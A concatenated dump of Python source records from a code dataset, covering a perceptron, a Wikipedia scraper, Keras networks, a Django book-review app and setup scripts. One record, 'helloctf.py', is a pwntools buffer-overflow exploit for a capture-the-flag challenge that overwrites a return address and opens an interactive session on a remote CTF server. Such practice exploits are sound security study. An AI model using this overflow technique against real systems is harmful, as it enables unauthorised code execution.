res[i] = res[i]+val\r\n return tuple(res)","sub_path":"src/MessagePassingMud/map/directions.py","file_name":"directions.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"57643056","text":"import numpy as np\r\n\r\nclass Perceptron(object):\r\n\r\n def __init__(self, inputs, bias, maxIter = 1000, rate = 1):\r\n self.maxIter = maxIter\r\n self.rate = rate\r\n self.weights = np.array(inputs)\r\n self.bias = bias\r\n\r\n def predict(self, inputs):\r\n output = np.dot(inputs, self.weights) + self.bias\r\n if output >= 0:\r\n activation = 1\r\n else:\r\n activation = 0\r\n return activation\r\n\r\n def train(self, train_inputs, labels):\r\n for _ in range(self.maxIter):\r\n for inputs, label in zip(train_inputs, labels):\r\n prediction = self.predict(inputs)\r\n # np.add(self.weights, self.rate * (label - prediction) * inputs, out = self.weights, casting = \"unsafe\")\r\n self.weights = self.weights + self.rate * (label - prediction) * inputs\r\n self.bias = self.bias + self.rate * (label - prediction)\r\n # print(self.weights, self.bias)\r\n # print(self.weights, self.bias)","sub_path":"Perceptron Algorithm/New_Perceptron.py","file_name":"New_Perceptron.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"3052221","text":"#!/usr/bin/env python3\nfrom pwn import *\nimport pwnlib.shellcraft\nimport pwnlib\nimport time\n\npwn_file = \"./helloctf\"\nelf = ELF(pwn_file)\ncontext.os='linux'\ncontext.arch = 'amd64'\ncontext.terminal = ['tmux', 'splitw', '-h']\n\ncontext.log_level = 100\ncontext.log_level = 'debug'\n\nc = process(pwn_file)\ndbg_script = \"\"\"\n\"\"\"\n#gdb.attach(c,dbg_script)\nc = remote('ctf.adl.tw', '11001')\nc.sendlineafter('CTF', b'A' * (16 + 8) + p64(0x4006c7))\nc.interactive()\nc.close()\n","sub_path":"ctf.adl.tw-2020/helloctf.py","file_name":"helloctf.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"434145406","text":"from bs4 import BeautifulSoup\nimport requests\n\n\ndef get_soup(target):\n response = requests.get(url=target)\n return BeautifulSoup(response.content, 'html.parser')\n\n\ndef form_wiki_href_from_slug(slug):\n if slug[0:3] == \"/w/\" or len(slug) == 0:\n return None\n return \"https://en.wikipedia.org\" + slug\n\n\ndef get_clean_ele_text(ele):\n return ele.text.strip()\n\n\ndef get_current_events_from_soup(soup, day, year, destination):\n wiki_current_itn = soup.find(\n \"div\", {\"aria-labelledby\": \"Topics_in_the_news\"})\n\n wiki_current_itn_featured = wiki_current_itn.find('ul').find_all('li')\n\n destination['featured'] = []\n\n for ele in wiki_current_itn_featured:\n news = {}\n link = ele.find('b').find('a')\n news['title'] = link['title']\n news['href'] = form_wiki_href_from_slug(link['href'])\n destination['featured'].append(news)\n\n wiki_current_ongoing = soup.find(\n \"div\", {\"aria-labelledby\": \"Ongoing_events\"})\n\n ongoing_categories_headers = wiki_current_ongoing.find_all(\"h3\")\n ongoing_categories_lists = wiki_current_ongoing.find_all(\"ul\")\n\n for i, category_header in enumerate(ongoing_categories_headers):\n category = get_clean_ele_text(category_header).lower()\n destination[category] = []\n\n for li in ongoing_categories_lists[i].find_all('li'):\n news = {}\n link = li.find('a')\n news['title'] = link['title']\n news['href'] = form_wiki_href_from_slug(link['href'])\n destination[category].append(news)\n\n scrape_target = \"https://en.wikipedia.org/wiki/Deaths_in_%s\" % (year)\n soup = get_soup(scrape_target)\n\n wiki_recent_deaths_day_header = soup.find('h3')\n\n header_int = int(wiki_recent_deaths_day_header.text)\n\n if header_int > int(day):\n wiki_recent_deaths_day_header = soup.find('h3').find_next_sibling(\n 'h3')\n\n wiki_recent_deaths = wiki_recent_deaths_day_header.find_next_sibling(\n 'ul').find_all('li')\n\n destination['deaths'] = []\n\n for li in wiki_recent_deaths:\n news = {}\n link = li.find('a')\n news['title'] = link['title']\n href = form_wiki_href_from_slug(link['href'])\n\n if href:\n news['href'] = href\n\n destination['deaths'].append(news)\n\n return\n","sub_path":"main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"345812111","text":"\n\nfrom xai.brain.wordbase.nouns._petard import _PETARD\n\n#calss header\nclass _PETARDS(_PETARD, ):\n\tdef __init__(self,): \n\t\t_PETARD.__init__(self)\n\t\tself.name = \"PETARDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"petard\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_petards.py","file_name":"_petards.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9541614","text":"import numpy as np\nimport tensorflow as tf\n\n\n#Restore\n\nwinput = tf.Variable(np.arange(10).reshape(1,10),dtype=tf.float32, name = \"Layer1_Weights\")\nbinput = tf.Variable(np.arange(10).reshape(1,10),dtype = tf.float32, name = \"Layer1_Bias\")\nwoutput = tf.Variable(np.arange(10).reshape(10,1),dtype=tf.float32, name = \"OutPut_Weights\")\nboutput = tf.Variable(np.arange(1).reshape(1,1),dtype = tf.float32, name = \"OutPut_Bias\")\nsaver = tf.train.Saver()\nsess = tf.Session()\nsaver.restore(sess,\"my_net/save_net.ckpt\")\nprint(\"winput\", sess.run(winput))\nprint(\"binput\", sess.run(binput))\nprint(\"woutput\", sess.run(woutput))\nprint(\"boutput\", sess.run(boutput))","sub_path":"myprictice/python/tf/RestoreFbp.py","file_name":"RestoreFbp.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"298142044","text":"'''\nCreated on Oct 30, 2018\n\n@author: daniel\n'''\n\nfrom keras.models import Model, Input\nfrom keras.layers import Convolution2D, Activation, BatchNormalization,MaxPooling2D, Convolution2DTranspose, Dropout, concatenate\nfrom Mylayers import MaxPoolingWithArgmax2D, MaxUnpooling2D\n\ndef inceptionModule(inputs, numFilters = 32):\n \n tower_0 = Convolution2D(numFilters, (1,1), padding='same', kernel_initializer = 'he_normal')(inputs)\n tower_0 = BatchNormalization()(tower_0)\n tower_0 = Activation(\"relu\")(tower_0)\n \n tower_1 = Convolution2D(numFilters, (1,1), padding='same',kernel_initializer = 'he_normal')(inputs)\n tower_1 = BatchNormalization()(tower_1)\n tower_1 = Activation(\"relu\")(tower_1)\n tower_1 = Convolution2D(numFilters, (3,3), padding='same',kernel_initializer = 'he_normal')(tower_1)\n tower_1 = BatchNormalization()(tower_1)\n tower_1 = Activation(\"relu\")(tower_1)\n \n tower_2 = Convolution2D(numFilters, (1,1), padding='same',kernel_initializer = 'he_normal')(inputs)\n tower_2 = BatchNormalization()(tower_2)\n tower_2 = Activation(\"relu\")(tower_2)\n tower_2 = Convolution2D(numFilters, (3,3), padding='same',kernel_initializer = 'he_normal')(tower_2)\n tower_2 = BatchNormalization()(tower_2)\n tower_2 = Activation(\"relu\")(tower_2)\n \n tower_3 = MaxPooling2D((3,3), strides=(1,1), padding='same')(inputs)\n tower_3 = Convolution2D(numFilters, (1,1), padding='same',kernel_initializer = 'he_normal')(tower_3)\n tower_3 = BatchNormalization()(tower_3)\n tower_3 = Activation(\"relu\")(tower_3)\n \n inception_module = concatenate([tower_0, tower_1, tower_2, tower_3], axis = 3)\n return inception_module\n \ndef createUNetInceptionIndexPooling(input_shape = (240,240,1), output_mode=\"sigmoid\", pool_size=(2,2)):\n inputs = Input(input_shape)\n \n numFilters = 16;\n \n conv1 = inceptionModule(inputs, numFilters)\n pool1, mask1 = MaxPoolingWithArgmax2D(pool_size)(conv1)\n \n conv2 = inceptionModule(pool1, 2*numFilters)\n pool2, mask2 = MaxPoolingWithArgmax2D(pool_size)(conv2)\n \n conv3 = inceptionModule(pool2, 4*numFilters)\n drop3 = Dropout(0.5)(conv3)\n pool3, mask3 = MaxPoolingWithArgmax2D(pool_size)(drop3)\n\n conv4 = inceptionModule(pool3, 8*numFilters)\n drop4 = Dropout(0.5)(conv4)\n pool4, mask4 = MaxPoolingWithArgmax2D(pool_size)(drop4)\n \n up6 = MaxUnpooling2D(pool_size)([pool4, mask4])\n merge6 = concatenate([conv4,up6],axis=3)\n conv6 = inceptionModule(merge6, 4*numFilters)\n \n up7 = MaxUnpooling2D(pool_size)([conv6, mask3])\n merge7 =concatenate([conv3,up7],axis=3)\n conv7 = inceptionModule(merge7, 2*numFilters)\n \n up8 = MaxUnpooling2D(pool_size)([conv7, mask2])\n merge8 =concatenate([conv2,up8],axis=3)\n conv8 = inceptionModule(merge8,numFilters)\n \n up9 = MaxUnpooling2D(pool_size)([conv8, mask1])\n merge9 =concatenate([conv1,up9],axis=3)\n conv9 = inceptionModule(merge9, numFilters)\n \n conv9 = Convolution2D(numFilters, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n conv9 = Convolution2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n conv10 = Convolution2D(1, 1, activation = output_mode)(conv9)\n\n model = Model(input = inputs, output = conv10)\n\n #model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])\n \n #model.summary()\n\n return model","sub_path":"UNetFactory/createUNetInceptionIndexPooling.py","file_name":"createUNetInceptionIndexPooling.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"648240499","text":"from setuptools import setup, find_packages\n\n\ndef read_file(name):\n with open(name) as fobj:\n return fobj.read().strip()\n\n\nLONG_DESCRIPTION = read_file(\"README.md\")\nVERSION = read_file(\"Ctl/VERSION\")\n\nsetup(\n name=\"django-ixpmgr\",\n version=VERSION,\n author=\"20C\",\n author_email=\"code@20c.com\",\n description=\"django overlay for IXP-Manager\",\n long_description=LONG_DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n license=\"LICENSE.txt\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Internet\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n packages=find_packages(\"src\"),\n package_dir={\"\": \"src\"},\n include_package_data=True,\n url=\"https://github.com/20c/django-ixpmgr\",\n download_url=f\"https://github.com/20c/django-ixpmgr/archive/{VERSION}.zip\",\n install_requires=[\"semver==2.10.2\"],\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"2176926","text":"from django.shortcuts import render , HttpResponse , redirect\nfrom django.http import JsonResponse\nfrom datetime import datetime\nfrom .models import Book , Profile , Comment , Rating\nfrom .forms import BookForm, UserForm , Profile , CommentForm, RegisterForm, ProfileForm , SettingForm , PasswordChangeingForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.contrib.auth.forms import PasswordResetForm , PasswordChangeForm\nfrom django.contrib.auth.views import PasswordChangeView\nfrom django.template.loader import render_to_string\nfrom django.db.models.query_utils import Q\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.utils.encoding import force_bytes\nfrom django.contrib import messages\nfrom django.urls import path ,reverse_lazy, include\n\n\n# Create your views here.\n\n# Get to HOME page\ndef home(request):\n # book= Book.objects.all()\n return render(request, 'home.html')\n\ndef signin(request):\n return render(request,\"user/signin.html\")\n\ndef search_by_type(request,mtype):\n book= Book.objects.filter(book_type=mtype)\n return render(request, 'book/searchbytype.html', {'books': book} ) \n\n\n#profile\ndef profile(request,pk): \n profile = Profile.objects.get(pk=pk)\n\n return render(request , 'profile/profile_show.html',{'profile':profile} )\n\ndef Profile_edit(request,pk):\n profile_edit = Profile.objects.get(pk=pk)\n if request.method == \"POST\":\n form = ProfileForm(request.POST, instance=profile_edit)\n if form.is_valid():\n profile_edit = form.save()\n messages.add_message(request , messages.SUCCESS , \"Update profile successfully\")\n return redirect('profile', pk=profile_edit.pk)\n else:\n form = ProfileForm(instance=profile_edit)\n return render(request, 'profile/profile_edit.html', {'form': form})\n\n\n\n\n# ------------------------------ book route ----------------------------\n# To display all the books\ndef books(request):\n all_books = Book.objects.all()\n horrorBook= Book.objects.filter(book_type=\"horror\")\n actionBook= Book.objects.filter(book_type=\"action\")\n return render(request , 'book/index.html', {\"all_books\" : all_books, 'horrorBook': horrorBook, 'actionBook': actionBook})\n\n# To view a selector book\ndef view_book(request, pk):\n \n total= 0\n count1=0\n count2=0\n count3=0\n count4=0\n count5=0\n id_ = pk\n rate= Rating.objects.filter(book=pk)\n if rate.count() == 0:\n total=1\n else: \n total=rate.count()\n for rete in rate:\n if rete.score == 1:\n count1 += 1\n if rete.score == 2:\n count2 += 1\n if rete.score == 3:\n count3 += 1\n if rete.score == 4:\n count4 += 1\n if rete.score == 5:\n count5 += 1\n # count1=count1/total*100\n # count2=count2/total*100\n # count3=count3/total*100\n # count4=count4/total*100\n # count5=count5/total*100\n try:\n one_book = Book.objects.get(pk=pk)\n except Exception:\n return HttpResponse(\"error\")\n\n return render(request , 'book/view.html', {\"book\" : one_book, \"count1\" : count1, \"count2\" : count2, \"count3\" : count3 , \"count4\" : count4, \"count5\" : count5})\n\n\ndef show_books(request):\n book= Book.objects.all()\n \n return render(request, 'home.html', {'all_book': book} ) \n\n# To add a new book\n@login_required()\ndef add_book(request):\n if request.method == 'POST':\n form = BookForm(request.POST)\n if form.is_valid():\n form.save()\n messages.add_message(request , messages.SUCCESS , \"Update book successfully\")\n return redirect('/book/')\n else:\n if request.user.profile.user_status:\n form = BookForm()\n return render(request , 'book/book_form.html', {'form': form})\n else:\n return redirect('/home/')\n\n# To Update the book\n@login_required()\ndef edit_book(request,pk):\n edit_book= Book.objects.get(pk=pk)\n form = BookForm(instance=edit_book)\n if (request.method == \"POST\"):\n Edit_book =BookForm(request.POST,instance=edit_book) \n if Edit_book.is_valid() :\n Edit_book.save()\n messages.add_message(request , messages.SUCCESS , \"Added book successfully\")\n return redirect (f'/book/{pk}')\n return render(request , 'book/book_form.html' , {\"form\" : form})\n\n# To Delete the book\n@login_required()\ndef delete_book(request , pk):\n book = Book.objects.get(pk=pk)\n book.delete()\n messages.add_message(request , messages.SUCCESS , \"Deleted book successfully\")\n return redirect('/book/')\n\n# Add a book to a favoriate list\n@login_required()\ndef favorite_book(request , pk):\n user = User.objects.get(pk = request.user.id)\n book = Book.objects.get(pk=pk)\n print(user.profile.fav_books.all)\n if book in user.profile.fav_books.all():\n user.profile.fav_books.remove(book)\n else:\n user.profile.fav_books.add(book)\n\n request.user = user\n print( user.profile.fav_books.all())\n return redirect(f'/book/{pk}/')\n\n# Add a book to a wantToRead\n@login_required()\ndef wantToRead(request , pk):\n user = User.objects.get(pk = request.user.id)\n book = Book.objects.get(pk=pk)\n if book in user.profile.wantToRead.all():\n user.profile.wantToRead.remove(book)\n else:\n user.profile.wantToRead.add(book)\n request.user = user\n print( user.profile.wantToRead.all())\n return redirect(f'/book/{pk}/')\n \n#----------------------- Auth ----------------------------------\ndef singin(request):\n messages.add_message(request , messages.SUCCESS , \"Login successfully\")\n return render(request,\"user/singin.html\")\n\ndef register(request):\n form = RegisterForm()\n if( request.method == \"POST\"):\n user = RegisterForm(request.POST)\n if(user.is_valid()):\n user.save()\n messages.add_message(request , messages.SUCCESS , \"Register successfully\")\n return redirect('/home/')\n else:\n form = user\n messages.add_message(request, messages.ERROR, 'Register failure')\n return render(request, \"user/register.html\", { \"form\": form })\n\n\nclass PasswordChangeView(PasswordChangeView):\n from_class= PasswordChangeingForm\n success_url=reverse_lazy('password_change_success')\n\ndef PasswordChangeDone(request):\n return render(request,\"auth/password_change_done.html\")\n\n#----------------------- profile ----------------------------------\n#show profile \ndef profile(request,pk): \n profile = Profile.objects.get(pk=pk)\n\n return render(request , 'profile/profile_show.html',{'profile':profile} )\n\n#Edit profile \n@login_required()\ndef Profile_edit(request,pk):\n profile_edit = Profile.objects.get(pk=pk)\n if request.method == \"POST\":\n form = ProfileForm(request.POST, request.FILES,instance=profile_edit)\n if form.is_valid():\n profile_edit = form.save()\n messages.add_message(request , messages.SUCCESS , \"Update profile successfully\")\n return redirect('profile', pk=profile_edit.pk)\n else:\n form = ProfileForm(instance=profile_edit)\n return render(request, 'profile/profile_edit.html', {'form': form})\n\n\n\n\n@login_required()\ndef Setting(request,pk):\n if request.method == \"POST\":\n form = SettingForm(request.POST, instance=request.user)\n if form.is_valid():\n profile_Setting = form.save()\n return redirect('profile', pk=request.user.id)\n else:\n form = SettingForm(instance=request.user)\n return render(request, 'profile/setting.html', {'form': form})\n\n# To add a new cooment\n@login_required()\ndef add_comment(request,pk):\n book1=Book.objects.get(pk=pk)\n if request.method == 'POST':\n form = CommentForm(request.POST, request.user)\n if form.is_valid():\n comment = form.save(commit=False)\n comment = Comment.objects.create(\n user =request.user,\n name=comment.name,\n comment=comment.comment,\n )\n comment.book.add(book1)\n comment.save()\n return redirect(f'/book/{pk}/')\n else:\n form = CommentForm()\n \"\"\" messages.add_message(request, messages.WARNING, \"Failed to add your comment\") \"\"\"\n\n return render(request , 'comment/add_comment.html', {'form': form})\n\n#To edit the comment\n@login_required()\ndef edit_comment(request,pk,pkb):\n edit_comment= Comment.objects.get(pk=pk)\n if edit_comment.user == request.user:\n form = CommentForm(instance=edit_comment)\n if (request.method == \"POST\"):\n Edit_comment =CommentForm(request.POST,instance=edit_comment) \n if Edit_comment.is_valid() :\n Edit_comment.save()\n return redirect (f'/book/{pkb}')\n else:\n return render(request , 'comment/add_comment.html' , {\"form\" : form})\n else: \n html = \"

you can't do it

\" \n return HttpResponse(html)\n\n# To Delete the comment\n@login_required()\ndef delete_comment(request , pk):\n comment = Comment.objects.get(pk=pk)\n if comment.user == request.user:\n comment.delete()\n messages.add_message(request , messages.SUCCESS , \"The comment deleted successfully\")\n return redirect('home')\n else: \n messages.add_message(request, messages.WARNING, \"Failed to add your comment\")\n\n\ndef Search(request):\n book= Book.objects.all()\n query = request.GET.get(\"q\")\n if query:\n book = Book.objects.filter(Q(name__icontains=query) )\n\n return render(request,'book/Search.html',{'all_books': book})\n\n# To add a new reting for a book\n@login_required()\ndef add_rate(request,pk):\n book1=Book.objects.get(pk=pk)\n val = request.POST['rate']\n print (\"rate : \"+request.POST['rate'])\n print (\"----------------------------\")\n print ( request.user)\n\n if request.method == 'POST':\n rate = Rating.objects.create(\n user =request.user,\n book=book1,\n score = request.POST['rate']\n )\n rate.save()\n messages.add_message(request , messages.SUCCESS , \"Added your rating successfully\")\n return redirect(f'/book/{pk}/')\n messages.add_message(request , messages.WARNING,\"There is an error please try again\")\n return redirect(f'/book/{pk}/')\n\n\n","sub_path":"book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"388900114","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('noccapp', '0004_auto_20150512_1242'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='patient',\n name='user',\n field=models.ForeignKey(verbose_name=b'utente', to=settings.AUTH_USER_MODEL, unique=True),\n ),\n ]\n","sub_path":"noccapp/migrations/0005_auto_20150512_1447.py","file_name":"0005_auto_20150512_1447.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"631381342","text":"# -*- encoding: utf-8 -*-\nimport logging\nimport unittest\nfrom mock import patch,MagicMock\nfrom src.controller.endpoint_handlers.base_endpoint_handler import \\\n BaseEndpointHandler\nfrom src.controller.logs.logger_factory import LoggerFactory\n\n\nclass TestBaseEndpointHandler(unittest.TestCase):\n\n def setUp(self ):\n logger = LoggerFactory.get_logger(\n # This path is set to be used with nosetests, so do not change.\n # Rather change the Pycharm launcher instead if needed and set it\n # to xxx\\ms-cloud\\python\\OutputHandlerNode\n \"./src/controller/logs/processing_node.log\", logging.INFO\n )\n #We disable the stream logger so exceptions do not print\n logger.handlers = logger.handlers[:-1]\n self.handler = BaseEndpointHandler(None, logger)\n\n def tearDown(self ):\n pass\n\n def test_log_endpoint_reads_file(self):\n input = \"Test\\nstring\\nfor\\nlog\\nfile\"\n expected = \"Test
string
for
log
file\"\n\n m = self.get_mock_for_file_open(input, 28)\n with patch('__builtin__.open', m) as mock:\n result = self.handler.handle_log_get()\n self.assertEquals(expected, result)\n\n def get_mock_for_file_open(self, file_text, file_bytes):\n mock = MagicMock(spec=file)\n handle = MagicMock(spec=file)\n handle.write.return_value = None\n handle.read.return_value = file_text\n handle.tell.return_value = file_bytes\n handle.__enter__.return_value = handle\n \"\"\"\n This is the tricky part. You have to specified a return_value to the\n mock intself. This way, when the test_subject calls open() the handle\n mock will be returned.\n\n If you do not assign a return_value to mock, then a random new mock\n will be returned to the test subject, which will have no values set\n for read() or tell().\n \"\"\"\n mock.return_value = handle\n return mock\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/test_base_endpoint_handler.py","file_name":"test_base_endpoint_handler.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83952569","text":"from django.shortcuts import render\nfrom django.views.generic import View\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate,login\n\nfrom .forms import UserAskForm\nfrom .models import UserAsk\n\n# Create your views here.\n\nclass ContentView(View):\n def get(self, request):\n return render(request, \"contact.html\")\n\n\ndef AskForm(request):\n if request.method == \"POST\":\n send_form = UserAskForm(request.POST) # 实例化 \\ 初始化form\n if send_form.is_valid(): # 验证是否合法(即是否满足forms.py的设置)\n msg = request.POST.get(\"msg\", \"\") # 取出 user_name 和 pass_word\n name = request.POST.get(\"name\", \"\")\n if UserAsk.objects.filter(msg=msg,name=name): # 判断 用户是否存在(如果存在)\n return render(request, \"contact.html\", {\"register_form\": send_form,\n \"msg\": \"请勿重复提交!\"}) # 即 这个 email已经被注册过,不存在就进行下面的操作,传回form回填信息,天使吧验证码保存\n name = request.POST.get(\"name\", \"\") # 取出 user_name\n email = request.POST.get(\"email\", \"\")\n mobile = request.POST.get(\"mobile\", \"\")\n zy = request.POST.get(\"zy\", \"\")\n msg = request.POST.get(\"msg\", \"\")\n content = authenticate(name=name,email=email,mobile=mobile,zy=zy,msg=msg)\n\n user_ask = UserAsk()\n user_ask.name = name\n user_ask.mobile = mobile\n user_ask.email = email\n user_ask.zy = zy\n user_ask.msg = msg\n user_ask.save()\n\n if content is not None:\n login(request,content)\n return render(request,\"contact.html\")\n else:\n return render(request,\"contact.html\",{\"msg\":\"添加信息出错\"})\n elif request.method ==\"GET\":\n return render(request,\"contact.html\")\n\n\n\n\n","sub_path":"apps/content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"262644444","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 26 16:31:08 2020\n\n@author: charles\n\"\"\"\nimport time\nimport notify2\nfrom top_news import top_story_sender\n\n\ndef notification_sender():\n \n \n news_recevied = top_story_sender()\n \n notify2.init('notifier')#itializer for d bus\n \n n = notify2.Notification(None) #notification object\n \n n.set_urgency(notify2.URGENCY_NORMAL)\n \n n.set_timeout(10000)\n \n for news in news_recevied:\n n.update(news['title'],news['description'])\n \n n.show()\n \n time.sleep(15000)\n \n \n \n\nnotification_sender()\n\n \n \n \n\n \n","sub_path":"notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"427930848","text":"import pyglet\nfrom pyglet.window import key, mouse\n\n# set pyglet resource dir\nimage_path = \"../../assets/image\"\npyglet.resource.path = [image_path]\n\n# create window, text and image objects\nwindow = pyglet.window.Window()\nlabel = pyglet.text.Label(\n \"Hello world\",\n font_name=\"Times New Roman\",\n font_size=36,\n x=window.width//2, \n y=window.height//2,\n anchor_x=\"center\", \n anchor_y=\"center\"\n )\nimage = pyglet.resource.image(\"mini.jpg\")\n \n@window.event\ndef on_key_press(symbol, modifiers):\n if symbol == key.A:\n print(\"A\")\n\n if symbol == key.LEFT:\n print(\"LEFT\")\n \n if symbol == key.ENTER:\n print(\"ENTER\")\n\n@window.event\ndef on_mouse_press(x, y, button, modifiers):\n if button == mouse.LEFT:\n print(\"mouse left\")\n\n@window.event\ndef on_draw():\n window.clear()\n image.blit(0, 0)\n label.draw()\n\nif __name__ == \"__main__\":\n pyglet.app.run()\n","sub_path":"example/01-PygletApp/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"286636257","text":"from flask import Flask\nfrom flask import redirect, url_for\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return 'Hello World!'\n\n@app.route('/user/')\ndef Hello(username):\n if username == 'victor':\n return f'Hello {username}'\n #return redirect(url_for('index'))\n return redirect('/', 303)\n\n@app.route('/user/')\ndef user_index(username):\n return f'Hello {username}'\n\n@app.route('/post/')\ndef show_post(post_id):\n return f'Post {post_id}'\n\n@app.route('/test')\ndef test():\n print(url_for('index'))\n print(url_for('user_index', username='shiyan'))\n print(url_for('show_post', post_id=2, _external=True))\n print(url_for('show_post', post_id=2, q='python 03'))\n print(url_for('show_post', post_id=2, q='python你好'))\n print(url_for('show_post', post_id=2, _anchor='a'))\n return 'test'\n\n@app.route('/test')\ndef test():\n print('xxx.simplelab.cn/courses/java')\n return redirect('/', 301)\n","sub_path":"flask_code_learn/app_test.py","file_name":"app_test.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"576109641","text":"#! /usr/bin/env python3\n\nimport re\nimport subprocess\nimport os\n\n\ndef path(*path_segments):\n return os.path.join(os.getcwd(), *path_segments)\n\n\ndef open_file(*path_segments):\n file_path = path(*path_segments)\n open(file_path, 'w').close()\n return open(file_path, 'a')\n\ndef get_commands():\n setup_py = open('setup.py', 'r')\n lines = setup_py.read()\n return re.findall(r' {8,}\\'([a-z0-9-]*.py) = jfscripts.[a-z0-9_]*:main\\',',\n lines)\n\n\ndef get_help(command):\n return subprocess.Popen('{} --help'.format(command), shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n\ndef heading(text):\n return '\\n{}\\n{}\\n\\n.. code-block:: text\\n\\n'.format(text, '-' * len(text))\n\n\ndef main():\n commands = get_commands()\n\n header = open(path('README_header.rst'), 'r')\n readme = open_file('README.rst')\n\n # footer = open(path('README_footer.rst'), 'r')\n\n for line in header:\n readme.write(line)\n\n readme.write('\\n')\n for command in commands:\n print(command)\n _help = get_help(command)\n _help.wait()\n readme.write(heading(command))\n\n for line in _help.stdout:\n indented_line = ' ' + line.decode('utf-8')\n readme.write(indented_line)\n\n # for line in footer:\n # readme.write(line)\n\n readme.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"_generate_doc.py","file_name":"_generate_doc.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"640487918","text":"import numpy\nfrom keras.utils import np_utils\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom com.kailin.api_image import api_image\nfrom com.kailin.api_file import api_file\n\nnumpy.random.seed(10)\n\n(train_image, train_label), (test_image, test_label) = mnist.load_data()\n\n# train_image_hot = train_image.reshape(60000, 784).astype('float32') / 255\n# test_image_hot = test_image.reshape(10000, 784).astype('float32') / 255\n\ntrain_image_hot = train_image.reshape(train_image.shape[0], 28, 28, 1).astype('float32') / 255\ntest_image_hot = test_image.reshape(test_image.shape[0], 28, 28, 1).astype('float32') / 255\n\ntrain_label_hot = np_utils.to_categorical(train_label)\ntest_label_hot = np_utils.to_categorical(test_label)\n\nmodel = Sequential()\nmodel.add(Conv2D(filters=16, kernel_size=(5, 5), padding='same', input_shape=(28, 28, 1), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(filters=36, kernel_size=(5, 5), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(units=512, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(units=128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(units=10, activation='softmax'))\n# default version\n# model.add(Dense(input_dim=784, units=1024, kernel_initializer='normal', activation='relu'))\n# model.add(Dropout(0.5))\n# model.add(Dense(units=512, kernel_initializer='normal', activation='relu'))\n# model.add(Dropout(0.5))\n# model.add(Dense(units=10, kernel_initializer='normal', 